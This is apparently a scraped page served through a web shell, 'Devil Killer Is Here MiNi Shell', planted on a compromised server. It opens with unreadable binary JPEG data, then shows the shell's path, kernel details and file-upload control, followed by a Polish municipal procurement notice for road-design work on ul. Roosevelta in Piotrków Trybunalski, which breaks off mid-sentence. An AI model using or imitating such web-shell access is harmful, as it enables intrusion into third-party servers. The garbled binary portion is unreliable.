JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220124/0003205001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie PFU oraz materiałów do uzyskania dec. o środowiskowych uwarunkowaniach dla potrzeb rozbudowy ul. Roosevelta w ramach „Rozbudowa ul. Roosevelta wraz z niezbędną infrastrukturą techniczną”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648468</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pasaż Karola Rudowskiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@piotrkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piotrkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie PFU oraz materiałów do uzyskania dec. o środowiskowych uwarunkowaniach dla potrzeb rozbudowy ul. Roosevelta w ramach „Rozbudowa ul. Roosevelta wraz z niezbędną infrastrukturą techniczną”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-22bf913f-7cfe-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00032050</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016777/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.26 Opracowanie dokumentacji projektowej dla zadania: Rozbudowa ul. Roosevelta wraz z niezbędną infrastrukturą techniczną</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Rządowy Fundusz Polski Ład </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/piotrkow_tryb <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/piotrkow_tryb</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania,<br/>składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych<br/>w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla wykonawców&#34;<br/>na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45- instrukcje Zamawiający<br/>dopuszcza przesyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa , tj.<br/>m.in.:.doc, .docx, .txt, .rtf, .xls, .xlsx, .ppt, .csv, .pdf, .jpg, .git, .png, .tif, .dwg, .ath,.kst, .zip, przy czym<br/>zamawiający zaleca wykorzystywanie plików w formacie .pdf. Maksymalny rozmiar pojedynczego pliku<br/>to 100 MB. Zalecenia zamawiającego dotyczące podpisów: 1) kwalifikowanego podpisu<br/>elektronicznego: dla dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES, Dokumenty<br/>w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES,2) podpisu zaufanego: wielkość<br/>dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml”,3) podpisu osobistego: dla<br/>dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony), dokumenty w<br/>formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym. Zamawiający<br/>dopuszcza korzystanie z komunikacji elektronicznej za poczty elektronicznej na adres:<br/>zamowienia.publiczne@piotrkow.pl lub skrzynki podawczej ePUAP, z<br/>zastrzeżeniem złożenia oferty i oświadczenia, o którym mowa w art. 125 ust.1 pzp.1) łączny rozmiar<br/>wiadomości wraz z wszystkimi załącznikami przesyłanej przy użyciu poczty elektronicznej nie może<br/>przekraczać 50 MB, 2) wysłanie wiadomości pocztą elektroniczną nie jest jednoznaczne z jej<br/>doręczeniem zamawiającemu,3) w przypadku skorzystania z poczty elektronicznej zaleca się, aby<br/>wykonawca żądał niezwłocznego potwierdzenia otrzymania przez niego wiadomości.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że Administratorem danych<br/>osobowych wykonawcy jest Prezydent Miasta, Pasaż K. Rudowskiego 10, 97-300 Piotrków Trybunalski<br/>2. W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z<br/>Inspektorem Ochrony Danych Osobowych w Urzędzie Miasta Piotrkowa Trybunalskiego, za<br/>pośrednictwem adresu e-mail: .pelka@piotrkow.pl 3. Dane osobowe będą przetwarzane w celu<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz w celu archiwizacji.<br/>4.Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych,<br/>wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i<br/>archiwach. 5. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym z<br/>uwzględnieniem przepisów w zakresie zamówień publicznych, a także podmiotom przetwarzającym<br/>dane na podstawie zawartych umów. 6. Dane osobowe wykonawcy będą przechowywane przez okres<br/>obowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku zamówień współfinansowanych ze<br/>środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu<br/>obowiązywania umowy. Okresy te dotyczą również wykonawców, którzy złożyli oferty i nie zostały one<br/>uznane, jako najkorzystniejsze (nie zawarto z tymi wykonawcami umowy). 7. Osobie, której dane<br/>dotyczą przysługuje prawo: 1) dostępu do danych. W przypadku, gdy wykonanie obowiązku<br/>związanego z prawem dostępu do danych wymagałoby niewspółmiernie dużego wysiłku, zamawiający<br/>może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu; 2) sprostowania danych, ich usunięcia oraz ograniczenia<br/>przetwarzania na warunkach określonych w przepisach Rozporządzenia Parlamentu i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy95/46/WE. Żądanie sprostowania danych nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z przepisami. Żądanie sprostowania danych nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z przepisami. Wystąpienie z żądaniem ograniczenia<br/>przetwarzania, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego lub konkursu; 3) wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych. 8. Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić<br/>zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności<br/>wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z<br/>postępowania lub odrzuceniem jego oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPZ.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Krótki opis przedmiotu zamówienia:<br/>1)	Wykonanie programu funkcjonalno – użytkowego (zwanego dalej PFU) zgodnie <br/>z wytycznymi zawartymi w Rozporządzeniu Ministra Rozwoju i Technologii z dnia <br/>20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, Rozdział 4 – Zakres i forma programu funkcjonalno-użytkowego § 15 do § 20 dla:<br/>a)	odcinka ul. Roosevelta od skrzyżowania z ul. Żeromskiego do skrzyżowania <br/>z ul. Przemysłową na podstawie - wariantu 1 koncepcji rozbudowy ulicy Roosevelta od skrzyżowania z ulicą Żeromskiego do granicy miasta Piotrków Trybunalski opracowanej w 2013 roku przez „Inwestor Konin – Pracownia Projektowa”, 62-510 Konin ul. Okólna 6 z uwzględnieniem uwag zamawiającego zawartych w opisie przedmiotu zamówienia,<br/>b)	odcinka ul. Roosevelta od skrzyżowania z ul. Przemysłową do skrzyżowania <br/>z ul. Wronią (bez przejazdu kolejowego) na podstawie dokumentacji technicznej pn. „Przebudowa/ rozbudowa ulicy F. Roosevelta <br/>wraz z budową/przebudową istniejącej infrastruktury technicznej na odcinku od ul. Przemysłowej do ulicy Granicznej w Piotrkowie Trybunalskim” opracowanej w 2015 roku przez &#34;VIA&#34; USŁUIGI TECHNICZNE<br/>I PROJEKTOWE W BUDOWNICTWIE DROGOWYM mgr inż. Tadeusz Budkowski 97-300 Piotrków Tryb. ul Wiślana 22B z uwzględnieniem uwag Zamawiającego zawartych w opisie przedmiotu zamówienia.<br/>– w ilości 4 egzemplarzy w formie papierowego oryginału oraz 1egz. w formie cyfrowej<br/>2)	Wykonanie Zbiorczego Zestawienia Kosztów (zwanego dalej ZZK) planowanej inwestycji na podstawie opracowanego PFU, zgodnie z wytycznymi zawartymi <br/>w Rozporządzeniu Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. <br/>w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym, oraz przedstawienie ich w formie tabelarycznej.<br/>– w ilości 2 kompletnych egzemplarzy w formie papierowego oryginału oraz 1 egz. w formie cyfrowej<br/>a)	Opracowane ZZK stanowić będzie podstawę wyceny zamówienia na roboty budowlane i wraz z PFU winny umożliwiać przeprowadzenie postępowania na wybór Wykonawcy zgodnie z USTAWĄ z dnia 11 września 2019 r. Prawo zamówień publicznych, <br/>b)	Szczegółową formę i zakres kosztorysów oraz ZZK należy uzgodnić zamawiającym w trakcie opracowania.<br/>3)	Sporządzenie skutecznych materiałów do uzyskania decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia (w tym: karty informacyjnej przedsięwzięcia lub ew. raportu środowiskowego) w oparciu o Ustawę z dnia <br/>3 października 2008 roku o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania <br/>na środowisko oraz Rozporządzenie Rady Ministrów z dnia 10 września <br/>2019 roku w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko.<br/>– w ilości 5 egzemplarzy w formie papierowego oryginału oraz 5 egz. w formie cyfrowej<br/>4) Zapewnienie współpracy z zamawiającym w trakcie postępowania przetargowego na wyłonienie wykonawcy robót budowlanych w formule „zaprojektuj i wybuduj” na podstawie opracowanego Programu Funkcjonalno – Użytkowego. Wykonawca na zgłoszenie zamawiającego zobowiązany <br/>jest do udziału w pracach w komisji przetargowej w charakterze biegłego, udzielania niezwłocznie odpowiedzi na pytania wykonawców dotyczące PFU, <br/>nie później jednak niż w terminie 48 godzin od przekazania treści zapytań <br/>oraz do uzupełniania braków, bez dodatkowego wynagrodzenia.<br/>5) W przypadku wejścia w życie nowych wytycznych, instrukcji bądź innych dokumentów w terminie udzielonej gwarancji i rękojmi przez wykonawcę, mających wpływ na treść opracowania w zakresie programu funkcjonalno – użytkowego wykonawca jest zobowiązany do niezwłocznej aktualizacji opracowania.<br/>2.	Do obowiązków wykonawcy należy:<br/>1)	pozyskanie niezbędnych dokumentów do zaprojektowania robót budowlanych, <br/>w szczególności:<br/>a)	kopii mapy zasadniczej w skali 1:500,<br/>b)	pomiaru ruchu komunikacyjnego wraz z jego analizą, hałasu i innych uciążliwości, <br/>c)	wyników badań podłoża gruntowego z określeniem warunków gruntowowodnych, <br/>d)	zaleceń konserwatorskich konserwatora zabytków,<br/>e)	inwentaryzacji zieleni,<br/>f)	danych dotyczących zanieczyszczeń atmosfery do analizy ochrony powietrza oraz posiadanych raportów, opinii lub ekspertyzy z zakresu ochrony środowiska, <br/>g)	dodatkowych warunków technicznych do projektowania dla budowy/ przebudowy infrastruktury technicznej kolidującej z przebudową drogi, jeżeli będzie zachodziła taka potrzeba, <br/>2)	zapewnienie stałego kontaktu i współpracy z Zamawiającym poprzez konsultacje biorąc udział w codwutygodniowych spotkaniach do czasu opracowania PFU <br/>i ZZK w celu omówienia szczegółowych rozwiązań technicznych, materiałowych <br/>i kosztowych.<br/>3)	wsparcie techniczne na etapie realizacji inwestycji w zakresie zgodności opracowywanej dokumentacji, materiałów, technologii i innych z PFU. Wsparcie techniczne będzie wymagane do momentu zakończenia opracowania dokumentacji i uzyskania ostatecznej decyzji ZRID. <br/>4)	uzyskanie poza akceptacją Zamawiającego wszelkich dokumentów, opinii, uzgodnień, zgód, decyzji, zezwoleń i sprawdzenia zastosowanych rozwiązań wymaganych w zakresie opracowywanej dokumentacji zgodnie z przepisami prawa.<br/>3.	Szczegółowo przedmiot zamówienia opisany został w SWZ CZĘŚĆ II. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">90712100-2 - Planowanie rozwoju środowiska miejskiego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez zamawiającego warunki udziału <br/>w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – zamawiający nie stawia warunku w powyższym zakresie, <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej <br/>lub zawodowej – zamawiający nie stawia warunku w powyższym zakresie, <br/>3)	sytuacji ekonomicznej lub finansowej – zamawiający nie stawia warunku <br/>w powyższym zakresie,<br/>4)	zdolności technicznej lub zawodowej:<br/>a)	polegające na należytym wykonaniu 1 zamówienia (a w przypadku świadczeń okresowych lub ciągłych wykonywaniu), w okresie ostatnich 3 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, usługę polegającą na wykonaniu programu funkcjonalno-użytkowego zgodnie z Rozporządzeniem w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, obejmującego przebudowę lub budowę lub rozbudowę drogi lub ulicy wraz z budową lub przebudową infrastruktury technicznej. tj. oświetlenia ulicznego lub kanalizacji deszczowej, lub kanalizacji sanitarnej, lub wodociągu o wartości min. 10.000,00 zł brutto;<br/>– wg załącznika nr 7 do IDW.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (konsorcjum) ww. warunek zostanie uznany przez zamawiającego <br/>za spełniony, jeżeli spełni go samodzielnie co najmniej jeden z wykonawców składających ofertę.<br/>b)	polegające na dysponowaniu i skierowaniu do realizacji zamówienia osób niezbędnych do wykonania zamówienia, w szczególności: <br/>	co najmniej jedną osobę pełniąca samodzielną funkcję techniczną <br/>w budownictwie w specjalności drogowej,<br/>	co najmniej jedną osobę pełniąca samodzielną funkcję techniczną <br/>w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji <br/>i urządzeń elektrycznych i elektroenergetycznych,<br/>	co najmniej jedną osobę pełniąca samodzielną funkcję techniczną <br/>w budownictwie w specjalności instalacyjnej w zakresie sieci, urządzeń <br/>i instalacji wodno-kanalizacyjnych,<br/>	co najmniej jedną osobę będącą specjalistą ds. ochrony środowiska.<br/>- wg załącznika nr 8 do IDW. <br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (konsorcjum) ww. warunek zostanie uznany przez zamawiającego <br/>za spełniony, jeżeli spełnią go łącznie wykonawcy składający ofertę.<br/>3.	Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy, w zakresie potwierdzenia braku podstaw wykluczenia z postępowania, obejmują:<br/>1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – którego 